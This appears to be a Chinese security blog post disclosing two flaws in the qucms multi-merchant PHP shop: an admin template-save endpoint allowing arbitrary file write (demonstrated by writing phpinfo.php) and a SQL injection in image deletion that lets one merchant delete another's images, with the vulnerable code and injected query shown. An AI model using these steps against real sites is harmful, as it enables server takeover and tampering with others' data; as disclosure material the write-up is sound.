qucms是一个B2B2C多商户电商系统
结合多年的电商开发经验推出B2B2C多店铺系统,是目前国内最优秀的电商平台之一,系统设计为“平台自营+供应商入驻”的电商运营模式,系统支持佣金结算、区域团购、实时物流、售后服务等基础功能;为电商运营商提供最优质的系统和服务。 该程序采用非常流行的PHP作为开发语言,给很多广大开发者一个容易上手,能快速进入业务,成熟的语言架构,去除无用直达高效的设计,给企业快速开发,赢的市场。
1. 后台GETSHELL
打开URLwww.yousite.xxx?m=template
后,呈现这个页面:
点击进入目录
我们将filename
修改为phpinfo.php
,把content
修改为<?php phpinfo();?>
修改后的数据包:
然后就会在根目录创建一个名为phpinfo.php
的文件,并且内容为<?php phpinfo();?>
漏洞代码处:
public function save() {
if ($_POST) { $file = P('filename', '修改的文件名不能为空'); $content = P('content'); $query = file_put_contents($file, stripslashes_deep($content)); if ($query) { right_json(); } else { error_json('保存失败'); } } else { error_json('提交错误'); } }加上这三段代码,便于调试:把
Burp
抓的包放到Repeater
( 按住ctrl+r )模块里
file_put_contents
的返回值是第二个参数的长度这里因为没有做任何过滤,所以这里导致了任意文件写入漏洞
前台任意删除他人图片:
漏洞处:
漏洞讲解开始
首先选择这个ID为
1566
的那张图片点击删除,并且用Burp
进行抓包:
![]()
我们首先随便输入一下错误的语法( 方便看到他的执行了什么语句 ):
![]()
可以看到他执行的SQL语句是:
1
select id,shop_id,url from uq_album where shop_id = 4 and id = 1566 or xxxx #查询uq_album表中条件为shop_id=4与id=1566的id和shop_id和url
我们现在身为
test2
想把test1
的图片删了,那么我们就构造一下sql语句~
1
select id,shop_id,url from uq_album where shop_id = 4 and id = 1566 or shop_id in (5)
可以看见这里有3条数据被展现出来了,也就是
test2
上传的图片
![]()
代码处:
下次补~~
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论